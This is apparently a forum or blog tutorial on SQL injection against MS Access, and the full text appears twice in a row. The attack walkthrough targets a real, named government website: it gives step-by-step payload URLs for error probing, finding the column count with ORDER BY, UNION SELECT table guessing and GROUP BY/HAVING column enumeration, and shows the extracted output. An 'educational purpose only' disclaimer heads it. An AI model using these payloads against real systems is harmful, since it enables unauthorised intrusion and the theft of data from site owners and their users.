NOTE:This Tutorial is for educational purpose only.
Quick Guide for MS Access Injection
Greetings to all,
Today Im gonna discuss MS Access Injection which is rare really n wiered too Smile . Hardly some web still using it.
Introduction
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Default Tables Used In Access
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship
Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
SysObjects
MSysQueries
MSysRelationships
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain Confused it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table Smile .
Column Enumeration and Union
We will use the # for commenting the rest of the query instead of -- or /* .
Step-1
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103
Above site is vuln to sql injection let's see what error we get ?
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
/h_reps/members.asp, line 16
Step-2
Using order by to get columns.
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from MSysAccessObjects#
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .
Most common tables are below
users
admin
administrator
login
customers
user
members
member
customer
Step-4: Getting table
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members group by members.id having 1=1#
Page will load with out any error now lets put "id" in place of number of column we see on our screen
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102
Now let's get next column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#
Page will load with out any error now lets put "now" in place of number of column we see on our screen
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3?0,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM
Thats All guys Smile .
Special thanks to : Renorobert , N3t.Crack3R , Sho0ter
If you like this do post your comments regarding this Smile .
Tutorial By NET_Spy with Thnx to PK Injector
Quick Guide for MS Access Injection
Greetings to all,
Today Im gonna discuss MS Access Injection which is rare really n wiered too Smile . Hardly some web still using it.
Introduction
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Default Tables Used In Access
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship
Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships
Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
SysObjects
MSysQueries
MSysRelationships
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain Confused it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table Smile .
Column Enumeration and Union
We will use the # for commenting the rest of the query instead of -- or /* .
Step-1
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103
Above site is vuln to sql injection let's see what error we get ?
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
/h_reps/members.asp, line 16
Step-2
Using order by to get columns.
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from MSysAccessObjects#
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .
Most common tables are below
users
admin
administrator
login
customers
user
members
member
customer
Step-4: Getting table
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members group by members.id having 1=1#
Page will load with out any error now lets put "id" in place of number of column we see on our screen
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102
Now let's get next column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#
Page will load with out any error now lets put "now" in place of number of column we see on our screen
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3?0,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM
Thats All guys Smile .
Special thanks to : Renorobert , N3t.Crack3R , Sho0ter
If you like this do post your comments regarding this Smile .
Tutorial By NET_Spy with Thnx to PK Injector
0 comments:
Post a Comment